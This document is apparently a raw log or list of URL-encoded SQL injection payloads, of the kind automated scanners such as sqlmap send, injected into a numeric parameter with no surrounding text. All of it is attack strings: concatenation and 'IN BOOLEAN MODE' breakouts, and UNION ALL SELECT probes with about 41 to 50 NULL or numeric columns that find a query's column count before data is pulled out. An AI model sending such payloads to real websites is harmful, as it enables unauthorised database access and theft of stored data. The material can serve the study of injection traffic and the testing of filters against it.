1234.5%27%7C%7C%28SELECT%20%27GzuZ%27%20FROM%20DUAL%20WHERE%205757%3D5757%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27XKmF%27%20FROM%20DUAL%20WHERE%201518%3D1518%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Mcis%27%20WHERE%207750%3D7750%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27nIic%27%20WHERE%209426%3D9426%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27hTtc%27%20WHERE%201720%3D1720%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Cgol%27%20WHERE%202650%3D2650%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27bLwW%27%20WHERE%202679%3D2679%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27PjdX%27%20WHERE%206180%3D6180%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27DkOY%27%20WHERE%207557%3D7557%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27rJpx%27%20WHERE%202091%3D2091%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27BbbH%27%20WHERE%205300%3D5300%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27RZDH%27%20WHERE%208093%3D8093%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20DMWJ%20WHERE%202970%3D2970%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20NQMP%20WHERE%201185%3D1185%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20oCAU%20WHERE%202703%3D2703%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20SlJX%20WHERE%208262%3D8262%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20Bkvm%20WHERE%202536%3D2536%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20iyDT%20WHERE%207450%3D7450%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20nqlm%20WHERE%205366%3D5366%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20WWmL%20WHERE%204972%3D4972%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20WfVt%20WHERE%208684%3D8684%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20rIjv%20WHERE%207046%3D7046%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27OvbE%27%20WHERE%205099%3D5099%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27hYPv%27%20WHERE%208165%3D8165%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27mgcB%27%20WHERE%207720%3D7720%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27EePX%27%20WHERE%205515%3D5515%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27yOvF%27%20WHERE%202318%3D2318%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27UVIF%27%20WHERE%201129%3D1129%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27jmQX%27%20WHERE%208898%3D8898%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27pIoE%27%20WHERE%209346%3D9346%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27RFAy%27%20WHERE%206412%3D6412%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27njeP%27%20WHERE%202911%3D2911%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -2298%29%20UNION%20ALL%20SELECT%205603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%2C5603%23 -7261%29%20UNION%20ALL%20SELECT%206419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%2C6419%23 -4944%29%20UNION%20ALL%20SELECT%204229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%2C4229%23 -4696%29%20UNION%20ALL%20SELECT%203648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%2C3648%23 -8275%29%20UNION%20ALL%20SELECT%209317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%2C9317%23 